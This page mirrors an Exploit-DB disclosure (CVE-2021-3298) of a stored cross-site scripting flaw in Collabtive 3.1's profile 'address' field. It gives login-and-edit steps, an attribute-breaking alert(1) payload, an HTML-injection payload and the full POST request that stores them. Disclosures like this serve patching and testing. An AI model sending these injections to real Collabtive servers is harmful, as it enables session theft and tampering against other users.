Collabtive 3.1 – ‘address’ Persistent Cross-Site Scripting

• Exploit Database
• 120 阅读

• 作者： Deha Berkin Bir
  日期： 2021-01-25
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49468/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115

  # Exploit Title: Collabtive 3.1 - &apos;address&apos; Persistent Cross-Site Scripting # Date: 2021-01-23 # Exploit Author: Deha Berkin Bir # Vendor Homepage: https://collabtive.o-dyn.de/ # Version: 3.1 # Tested on: Windows & XAMPP # CVE: CVE-2021-3298   ==> Tutorial <==   1- Login to your account. 2- Go to the profile edit page and write your XSS/HTML payload into "Address" section. - You will see the executed HTML payload at there. (HTML Injection) - You will see the executed XSS payload at profile edit section. (XSS)   ==> Executed Payloads <==   XSS Payload ==> " onfocus="alert(1)" autofocus=" HTML Payload ==> <h1>DehaBerkinBir</h1>   ==> HTTP Request <==   POST /manageuser.php?action=edit HTTP/1.1 Host: (HOST) User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://(HOST)/manageuser.php?action=editform&id=1 Content-Type: multipart/form-data; boundary=---------------------------12097618915709137911841560297 Content-Length: 2327 Connection: close Cookie: activeSlideIndex=0; PHPSESSID=oj123o7asdfasdfu4pts2g Upgrade-Insecure-Requests: 1   -----------------------------12097618915709137911841560297 Content-Disposition: form-data; name="name"   admin -----------------------------12097618915709137911841560297 Content-Disposition: form-data; name="userfile"; filename="" Content-Type: application/octet-stream     -----------------------------12097618915709137911841560297 Content-Disposition: form-data; name="file-avatar"     -----------------------------12097618915709137911841560297 Content-Disposition: form-data; name="company"     -----------------------------12097618915709137911841560297 Content-Disposition: form-data; name="email"   dehaberkinbir@hotmail.com -----------------------------12097618915709137911841560297 Content-Disposition: form-data; name="web"     -----------------------------12097618915709137911841560297 Content-Disposition: form-data; name="tel1"     -----------------------------12097618915709137911841560297 Content-Disposition: form-data; name="tel2"     -----------------------------12097618915709137911841560297 Content-Disposition: form-data; name="address1"   " onfocus="alert(1)" autofocus=" -----------------------------12097618915709137911841560297   Content-Disposition: form-data; name="zip"     -----------------------------12097618915709137911841560297 Content-Disposition: form-data; name="address2"     -----------------------------12097618915709137911841560297 Content-Disposition: form-data; name="country"     -----------------------------12097618915709137911841560297 Content-Disposition: form-data; name="state"   admin -----------------------------12097618915709137911841560297 Content-Disposition: form-data; name="gender"     -----------------------------12097618915709137911841560297 Content-Disposition: form-data; name="locale"     -----------------------------12097618915709137911841560297 Content-Disposition: form-data; name="admin"     -----------------------------12097618915709137911841560297 Content-Disposition: form-data; name="oldpass"   admin -----------------------------12097618915709137911841560297 Content-Disposition: form-data; name="newpass"     -----------------------------12097618915709137911841560297 Content-Disposition: form-data; name="repeatpass"     -----------------------------12097618915709137911841560297--